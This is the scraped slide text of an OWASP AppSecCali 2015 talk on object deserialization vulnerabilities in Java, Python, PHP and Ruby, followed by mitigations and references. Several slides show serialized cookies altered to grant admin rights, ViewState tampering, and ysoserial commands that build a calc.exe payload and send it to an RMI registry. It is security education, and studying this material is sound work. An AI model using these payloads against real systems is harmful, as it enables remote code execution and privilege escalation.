Alex Matrosov
 
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Ontico
 
Marat-Slides
Marat Vyshegorodtsev
 
3
Marat Vyshegorodtsev
 
Crypto Strikes Back! (Google 2009)
Nate Lawson
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (DeepSec Edition)
CODE WHITE GmbH
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class (RuhrSec Edition)
CODE WHITE GmbH
 
Fixing the Java Serialization Mess
Salesforce Engineering
 
Auscert 2022 - log4shell and history of Java deserialisation RCE
David Jorm
 
Breaking .net through serialization
Net Drive
 
Cigital-ExploitingJava
Travis Biehn
 
A CTF Hackers Toolbox
Stefan
 
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Checkmarx
 
(De)serial Killers - BSides Las Vegas & AppSec IL 2018
Dor Tumarkin
 
IBM Global Security Kit as a Cryptographic layer for IBM middleware
Oktawian Powazka
 
Java Hurdling: Obstacles and Techniques in Java Client Penetration-Testing
Tal Melamed
 
[Wroclaw #7] Why So Serial?
OWASP
 
Ad

Recently uploaded (20)

PDF
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
REPORT: Heating appliances market in Poland 2024
SPIUG
 
PPTX
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
PDF
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
PDF
Software Development Methodologies in 2025
KodekX
 
PDF
The Future of Artificial Intelligence (AI)
Mukul
 
PDF
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
PDF
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
PDF
Brief History of Internet - Early Days of Internet
sutharharshit158
 
PDF
Security features in Dell, HP, and Lenovo PC systems: A research-based compar...
Principled Technologies
 
PDF
AI-Cloud-Business-Management-Platforms-The-Key-to-Efficiency-Growth.pdf
Artjoker Software Development Company
 
PDF
The Evolution of KM Roles (Presented at Knowledge Summit Dublin 2025)
Enterprise Knowledge
 
PDF
A Day in the Life of Location Data - Turning Where into How.pdf
Precisely
 
PDF
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
PDF
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
PPTX
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
PDF
Advances in Ultra High Voltage (UHV) Transmission and Distribution Systems.pdf
Nabajyoti Banik
 
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
REPORT: Heating appliances market in Poland 2024
SPIUG
 
AI in Daily Life: How Artificial Intelligence Helps Us Every Day
vanshrpatil7
 
The Future of Mobile Is Context-Aware—Are You Ready?
iProgrammer Solutions Private Limited
 
Software Development Methodologies in 2025
KodekX
 
The Future of Artificial Intelligence (AI)
Mukul
 
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
Brief History of Internet - Early Days of Internet
sutharharshit158
 
Security features in Dell, HP, and Lenovo PC systems: A research-based compar...
Principled Technologies
 
AI-Cloud-Business-Management-Platforms-The-Key-to-Efficiency-Growth.pdf
Artjoker Software Development Company
 
The Evolution of KM Roles (Presented at Knowledge Summit Dublin 2025)
Enterprise Knowledge
 
A Day in the Life of Location Data - Turning Where into How.pdf
Precisely
 
Event Presentation Google Cloud Next Extended 2025
minhtrietgect
 
Responsible AI and AI Ethics - By Sylvester Ebhonu
Sylvester Ebhonu
 
What-is-the-World-Wide-Web -- Introduction
tonifi9488
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
Advances in Ultra High Voltage (UHV) Transmission and Distribution Systems.pdf
Nabajyoti Banik
 

OWASP AppSecCali 2015 - Marshalling Pickles

  • 1. Marshalling Pickles how deserializing objects can ruin your day Gabriel Lawrence (@gebl) and Chris Frohoff (@frohoff)
  • 2. 2 Survey of object serialization vulnerabilities Example exploitation − Sample Apps − Novel Vectors − New Tools Mitigation techniques Talk Goals *Did our best to find previous research and give credit/references. Please let us know if we missed any.
  • 3. 3 snapshots one or more “live”, in-memory objects into a flat, serial stream of data that can be stored or transmitted for reconstitution and use by a different process or the same process at some point Formats − Binary: Java Serialization, Ruby Marshal, Protobuf, Thrift, Avro, MS-NRBF, Android Binder/Parcel, IIOP − Hybrid/Other: PHP Serialization, Python pickle, Binary XML/JSON − Readable: XML, JSON, YAML Platform/Formats may have multiple implementations and/or sub-formats Serializing Objects a.k.a. “marshaling”, “pickling”, “freezing”, ”flattening”
  • 4. 4 Remote/Interprocess Communication (RPC/IPC) − Communicating data to different system/process − Wire protocols, web services, message brokers Caching/Persistence − Communicating data to process’ future self − Databases, cache servers, file systems Tokens − Communicating data to different system/process and back − HTTP cookies, HTML form parameters, API auth tokens Purposes and Mediums Why and where
  • 5. 5 Developers trust it too much and make assumptions − Assume storage/transmission mediums are protected − Assume binary formats are opaque − Assume token authentication can’t be defeated − Assume serialization is “safe“ We abuse trust and defy assumptions for a living But why do we care?
  • 6. 6 “Any big binary blob needs to be investigated as potential object serialization”
  • 8. 8 THESE DEMOS ARE FICTIONAL DRAMATIZATIONS BASED ON TRUE STORIES AND REAL EVENTS. ALL NAMES HAVE BEEN CHANGED TO PROTECT THE GUILTY. * * We have actually seen this stuff in assessments
  • 10. 10 What’s that? Base64 encoded serialized Java object as a cookie value
  • 11. 11 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Serialized Java Object
  • 12. 12 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Class Description
  • 13. 13 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0074 0004 ng/String;xp.t.. 0000060: 6761 6265 gabe Data in object
  • 14. 14 0000000: aced 0005 7372 001d 636f 6d2e 7175 616c ....sr..com.qual 0000010: 636f 6d6d 2e69 7372 6d2e 6170 7073 6563 comm.isrm.appsec 0000020: 2e55 7365 7200 0000 0000 0000 0102 0002 .User........... 0000030: 5a00 0b75 7365 7249 7341 646d 696e 4c00 Z..userIsAdminL. 0000040: 046e 616d 6574 0012 4c6a 6176 612f 6c61 .namet..Ljava/la 0000050: 6e67 2f53 7472 696e 673b 7870 0174 0005 ng/String;xp.t.. 0000060: 6368 7269 73 chris Data in object (Manipulated)
  • 15. 15 Screen Shots – Normal Login https://bitbucket.org/gebl/appseccali-cookie
  • 16. 16 Screen Shots – Manipulated to be Admin and Chris https://bitbucket.org/gebl/appseccali-cookie
  • 17. 17 By default, pickle data format uses an ASCII representation − Protocol version 0: ASCII protocol − Protocol version 1: Old binary format − Protocol version 2: New binary format Good write up on the formats: − http://spootnik.org/entries/2014/04/05_diving-into-the-python-pickle-format.html Python Pickle in Cookie
  • 18. 18 What’s that? Base64 encoded pickled Python object
  • 19. 19 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. Pickled Python Object
  • 20. 20 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. Admin Property
  • 21. 21 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3030 0a73 5327 7573 6572 270a 7033 .I00.sS'user'.p3 0000020: 0a56 6761 6265 0a70 340a 732e .Vgabe.p4.s. User Property
  • 22. 22 0000000: 2864 7031 0a53 2761 646d 696e 270a 7032 (dp1.S'admin'.p2 0000010: 0a49 3031 0a73 5327 7573 6572 270a 7033 .I01.sS'user'.p3 0000020: 0a56 6368 7269 730a 7034 0a73 2e .Vchris.p4.s. Properties (Manipulated)
  • 23. 23 Screen Shots – Normal Login https://bitbucket.org/gebl/appseccali-inapickle
  • 24. 24 Screen Shots – Manipulated to be Admin and Chris https://bitbucket.org/gebl/appseccali-inapickle
  • 26. 26 PHP Serialization Format Basic types: − <type specifier>:<data>; Arrays: − a:<count>:{<key>:<value>,…} Two ways for Objects: − “O” just like array − Custom defined by developer http://www.phpinternalsbook.com/classes_objects/serialization.html
  • 27. 27 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. PHP Serialized Object
  • 28. 28 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Class Name
  • 29. 29 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. IsAdmin Property
  • 30. 30 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Plan Property (Filename)
  • 31. 31 0000000: 4f3a 343a 2255 7365 7222 3a33 3a7b 733a O:4:"User":3:{s: 0000010: 373a 2269 7361 646d 696e 223b 623a 303b 7:"isadmin";b:0; 0000020: 733a 343a 2270 6c61 6e22 3b73 3a31 393a s:4:"plan";s:19: 0000030: 222f 7661 722f 7777 772f 6e6f 706c 616e "/var/www/noplan 0000040: 2e74 7874 223b 733a 383a 2275 7365 726e .txt";s:8:"usern 0000050: 616d 6522 3b73 3a34 3a22 6761 6265 223b ame";s:4:"gabe"; 0000060: 7d0a }. Username Property
  • 32. 32 Screen Shot - Normal https://bitbucket.org/gebl/appseccali-php
  • 36. 36 Screen Shot – Memcache changed https://bitbucket.org/gebl/appseccali-php
  • 37. 37 Expression Language (EL) allows the use of simple expressions to: − Dynamically read application data − Dynamically write application data − Invoke arbitrary methods Java Server Faces http://www.developer.am/interesting/jsp-application-lifecycle/
  • 38. 38 <h:form> <qcom:userheader dispname="#{loginBean.name}"></qcom:userheader> <ui:fragment rendered="#{loginBean.isadmin}"> <p> you are an admin!</p> </ui:fragment> <h:panelGrid columns="2"> <h:outputText value="Update Login Name"></h:outputText> <h:inputText value="#{loginBean.name}"></h:inputText> </h:panelGrid> <h:commandButton value="Update" action="update"></h:commandButton> </h:form> JSP Source https://bitbucket.org/gebl/appseccali-jsf-el
  • 40. 40 java -jar ViewStateMesser.jar dump Array Items: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 1338668845 Fields: _children: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 159413332 Fields: _children: Array Items: org.apache.myfaces.application.TreeStructureManager$TreeStructComponent 1028214719 Fields: _children: com.qualcomm.isrm.jsf.NullReference@1ddc4ec2 _componentClass: javax.faces.component.html.HtmlOutputLabel _componentId: Dump of ViewState https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
  • 41. 41 org.apache.myfaces.view.facelets.el.ContextAwareTagValueExpressionUEL 935044096 Fields: Custom: org.apache.el.ValueExpressionImpl 396180261 Fields: Custom: 00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 00 11 23 7b 6c 6f 67 69 6e 42 65 61 6e 2e 6e 61 6d 65 7d 00 10 6a 61 76 61 2e 6c 61 6e 67 _ _ # { l o g i n B e a n . n a m e } _ _ j a v a . l a n g 2e 4f 62 6a 65 63 74 . O b j e c t NULL NULL Dump of ViewState https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
  • 42. 42 Usage: − java -jar ViewStateMesser.jar "#{loginBean.isadmin}“ Finds all org.apache.el.ValueExpressionImpl and replaces the EL with the supplied argument. Similar to Synacktiv InYourFace tool Changing the ViewState EL https://bitbucket.org/gebl/appseccali-jsf-el & https://bitbucket.org/gebl/viewstatemesser
  • 43. 43
  • 45. 45 Code reuse attack (a la ROP) Uses “gadget” classes already in scope of application Create chain of instances and method invocations − Start with “kick-off” gadget that executes during or after deserialization − End in “sink” gadget that executes arbitrary code/commands − Use other gadgets to chain start gadget execution to end gadget Serialize chain and send to vulnerable deserialization in application Chain executed in application during/after deserialization Profit Property-Oriented Programming / Object Injection Earliest POP research we found was by Stefan Esser (@i0n1c), “Utilizing Code Reuse/ROP in PHP Application Exploits"
  • 46. 46 Rube-Goldberg-esque Gadget chains are generally carrier-medium, application, and OS/platform agnostic − Relies only on code available to application − Not necessarily code used by application Gadget Classes − Target common libraries/frameworks. Library sprawl FTW. − “Proxy” gadgets versatile − Deserialization hook methods for self-execution Gadget hunting and chain construction is an art − Can be frustrating and tedious − Rich IDEs help, but custom tools are better − https://github.com/frohoff/inspector-gadget (out of scope for talk) Property-Oriented Programming / Object Injection
  • 47. 47 Target Ruby’s ERB templating system Use Rails utility classes in chain Chain from Rails YAML exploit − YAML version required addition gadgets Executed by Rails by accessing session object after deserialization A Ruby + Rails Gadget Chain Chain discovered by Charlie Somerville (@charliesome) as part of a Rails YAML exploit
  • 48. 48 Code Execution via Ruby Marshal Exposed redis listener https://github.com/frohoff/appseccali-rails-redis https://github.com/frohoff/rails_exploits
  • 49. 49
  • 50. 50 A Simple Java Gadget Chain ObjectInputStream.readObject() “calc.exe”
  • 51. 51 Time-Lapse of Deserialization ObjectInputStream.readObject() called ObjectInputStream readObject() defaultReadObject()
  • 52. 52 Time-Lapse of Deserialization CacheManager instance allocated CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
  • 53. 53 Time-Lapse of Deserialization CacheManager.readObject() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
  • 54. 54 Time-Lapse of Deserialization ObjectInputStream.defaultReadObject() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject()
  • 55. 55 Time-Lapse of Deserialization CommandTask instance allocated and referenced by CacheManager.initHook field CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run()
  • 56. 56 Time-Lapse of Deserialization CommandTask.run() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run()
  • 57. 57 Time-Lapse of Deserialization Runtime.exec() called CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run() Runtime exec() “calc.exe”
  • 58. 58 Time-Lapse of Deserialization Target program run CacheManager ObjectInputStream readObject() readObject() defaultReadObject() CommandTask run() Runtime exec() “calc.exe”
  • 60. 60 Target java.lang.Runtime.exec(String cmd) Uses gadgets in JDK and Apache Commons-Collections library Self-executing during deserialization − Executes before object returned to caller A Java + Commons-Collections Gadget Chain Similar POP techniques previously applied to Java Serialization by Wouter Coekaerts (@WouterCoekaerts) and implemented by Alvaro Muñoz (@pwntester)
  • 62. 62 Gadget Chain Construction Code and Call Tree
  • 64. 64 Tool and utilities for generating Java deserialization exploit payloads Contains multiple gadget chain payloads − CommonsCollections1 (commons-collections) − CommonsCollections2 (commons-collections4) − Spring1 (spring-core, spring-beans) − Groovy1 (groovy) Create payload to execute calc.exe using CommonsCollections1 chain: $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe | xxd | head -3 0000000: aced 0005 7372 0032 7375 6e2e 7265 666c ....sr.2sun.refl 0000010: 6563 742e 616e 6e6f 7461 7469 6f6e 2e41 ect.annotation.A 0000020: 6e6e 6f74 6174 696f 6e49 6e76 6f63 6174 nnotationInvocat $ java -jar ysoserial-0.0.1-all.jar CommonsCollections1 calc.exe > payload.bin Send exploit payload to RMI Registry listener: $ java -cp ysoserial-0.0.1-all.jar ysoserial.RMIRegistryExploit myhost 1099 CommonsCollections1 calc.exe ysoserial: Usage info
  • 65. 65 Code Execution via Java Serializable JSF ViewState form parameters deserialized without authentication
  • 66. 66 Code Execution via Java Serializable JSF (MyFaces) ViewState form parameters deserialized
  • 67. 67
  • 68. 68 Code Execution via Java Serializable RMI Regisitry deserializing untrusted data from remoting protocol stream
  • 70. 70
  • 71. 71 General − Can only use classes available to application Java Serialization − ClassLoader of vulnerable code vs gadgets − Gadget classes must implement Serializable/Externalizable − Library/class version differences − Static type constraints Web frameworks − Many (but not all) now have sane defaults − Sign (and sometimes encrypt) client tokens: session cookies, viewstate, etc. Property Oriented Programming: Limitations & Caveats
  • 73. 73 Avoid open-ended (de)serialization when possible − If the serialization includes a class name, it’s probably bad Simple format and/or data types − Strings, Numbers, Arrays, Maps, etc. Manually serialize complex objects Keep session state on the server when possible − Beware of lateral attacks! (memcached, redis, database, etc.) Abstenence Avoid magic
  • 74. 74 Whitelist/Blacklist classes Constrain to expected type Statically typed object structure Schema-enforced formats Difficult without library support Restrict Deserialization Code defensively
  • 75. 75 Java − Default ObjectInputStream will deserialize any Serializable class − Class Blacklisting/Whitelisting − Subclass ObjectInputStream − override resolveClass() to allow/disallow classes − A bit of a hack − http://www.ibm.com/developerworks/library/se-lookahead/ Ruby − Default Marshal behavior deserializes any class − No obvious clean way to change − Maybe monkey patch Marshal hook methods on Object class (untested) PHP −  Restrict Deserialization
  • 76. 76 Python − Default unpickler will import any class − Pickle − Subclass Unpickler, override load_global − Load_global push safe classes onto pickler’s stack or raise an error − HACK according to the docs! − Cpickle − Set find_global to a function − Function takes module and class − Create on object or raise an error − https://docs.python.org/2/library/pickle.html − Section 11.1.6 Restrict Deserialization
  • 77. 77 Encryption != Authentication Authenticate channels − TLS Client Certs, SASL, DB/Cache/Broker credentials Authenticate content − HMAC or Authenticated Encryption with secret key Must be verified pre-deserialization! Pro-tip: Don’t leak crypto keys! Authenticate Trust Verify
  • 78. 78 Strict firewall rules for deserializing listeners Sandboxing/Hardening − Java SecurityManager − RestrictedPython − php.ini security settings − AppArmor − SELinux Security-in-depth Assume breach of defenses
  • 79. 79 Vulnerability is in doing unsafe deserialization, not in having gadgets available More will be always found Transitive dependencies cause library sprawl Cross-library gadget chains Auto-detection difficult Gadget Whack-a-Mole Don’t rely on this!
  • 80. 80 Find more unsafe deserialization Find more gadgets/chains Gadget finding tool improvements Explore mediums, platforms, formats, implementations Future Work (including for you) Go forth and pwn all the things
  • 81. 81 Stefan Esser, 2009/11/1, Shocking News in PHP Exploitation − https://www.nds.rub.de/media/hfs/attachments/files/2010/03/hackpra09_fu_esser_php_exploits1.pdf David Byrne, Rohini Sulatycki, 2010/6/21, Beware of Serialized GUI Objects Bearing Data − https://www.blackhat.com/presentations/bh-dc-10/Byrne_David/BlackHat-DC-2010-Byrne-SGUI-slides.pdf Stefan Esser, 2010/7/29, Utilizing Code Reuse/ROP in PHP Application Exploits − https://www.owasp.org/images/9/9e/Utilizing-Code-Reuse-Or-Return-Oriented-Programming-In-PHP-Application-Exploits.pdf Wouter Coekaerts, 2011/9/9, Spring Vulnerabilities − http://wouter.coekaerts.be/2011/spring-vulnerabilities Charlie Sommerville, 2013/1/10, Rails 3.2.10 Remote Code Execution − https://github.com/charliesome/charlie.bz/blob/master/posts/rails-3.2.10-remote-code-execution.md Arseniy Reutov, 2013/5/28, PHP Object Injection Revisited − https://prezi.com/5hif_vurb56p/php-object-injection-revisited/ Stephen Coty, 2013/6/14, Writing Exploits for Exotic Bug Classes: unserialize() − https://www.alertlogic.com/blog/writing-exploits-for-exotic-bug-classes/ Ben Murphy, 2013/6/23, Property Oriented Programming Applied to Ruby − http://slides.com/benmurphy/property-oriented-programming#/ Robert Heaton, 2013/7/22, How to hack a Rails app using its secret_token − http://robertheaton.com/2013/07/22/how-to-hack-a-rails-app-using-its-secret-token/ Dinis Cruz, 2013/8/6, Using XMLDecoder to execute server-side Java Code on an Restlet application − http://blog.diniscruz.com/2013/08/using-xmldecoder-to-execute-server-side.html Past Work / References
  • 82. 82 Abraham Kang, Dinis Cruz, Alvaro Munoz, 2013/8/6, RESTing on your laurels will get you pwned − http://www.slideshare.net/DinisCruz/res-ting-on-your-laurels-will-get-you-powned4-3 Tom Van Goethem, 2013/9/11, WordPress < 3.6.1 PHP Object Injection − https://vagosec.org/2013/09/wordpress-php-object-injection/ David Jorm, 2013/11/20, Java Deserialization Flaws: Part 1, Binary Deserialization − https://securityblog.redhat.com/2013/11/20/java-deserialization-flaws-part-1-binary-deserialization/ Alvaro Munoz, 2013/12/16, CVE-2011-2894: Deserialization Spring RCE − http://pwntester.com/blog/2013/12/16/cve-2011-2894-deserialization-spring-rce/ Dinis Cruz, 2013/12/22, XStream "Remote Code Execution" exploit on code from "Standard way to serialize and deserialize Objects with XStream" article, − http://blog.diniscruz.com/2013/12/xstream-remote-code-execution-exploit.html David Jorm, 2014/1/23, Java deserialization flaws: Part 2, XML deserialization − https://securityblog.redhat.com/2014/01/23/java-deserialization-flaws-part-2-xml-deserialization/ Johannes Dahse, Nikolai Krein, Thorsten Holz, 2014/11/3, Code Reuse Attacks in PHP: Automated POP Chain Generation − https://websec.files.wordpress.com/2010/11/rips_ccs.pdf − http://syssec.rub.de/media/emma/veroeffentlichungen/2014/09/10/POPChainGeneration-CCS14.pdf Renaud Dubourguais, Nicolas Collignon, JSF ViewState upside-down − http://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf Past Work / References
  • 83. 83 Sample Apps − https://bitbucket.org/gebl/appseccali-cookie − https://bitbucket.org/gebl/appseccali-inapickle − https://bitbucket.org/gebl/appseccali-php − https://bitbucket.org/gebl/appseccali-jsf-el − https://github.com/frohoff/appseccali-rails-redis − https://github.com/frohoff/appseccali-java Tools − https://bitbucket.org/gebl/viewstatemesser − https://github.com/frohoff/rails_exploits − https://github.com/frohoff/ysoserial − https://github.com/frohoff/inspector-gadget Sample Apps and Tools
  • 84. 84 For more information on Qualcomm, visit us at: www.qualcomm.com & www.qualcomm.com/blog Qualcomm is a trademark of Qualcomm Incorporated, registered in the United States and other countries. Other products and brand names may be trademarks or registered trademarks of their respective owners Thank you Follow us on: Gabe Lawrence [email protected] @gebl Chris Frohoff [email protected] @frohoff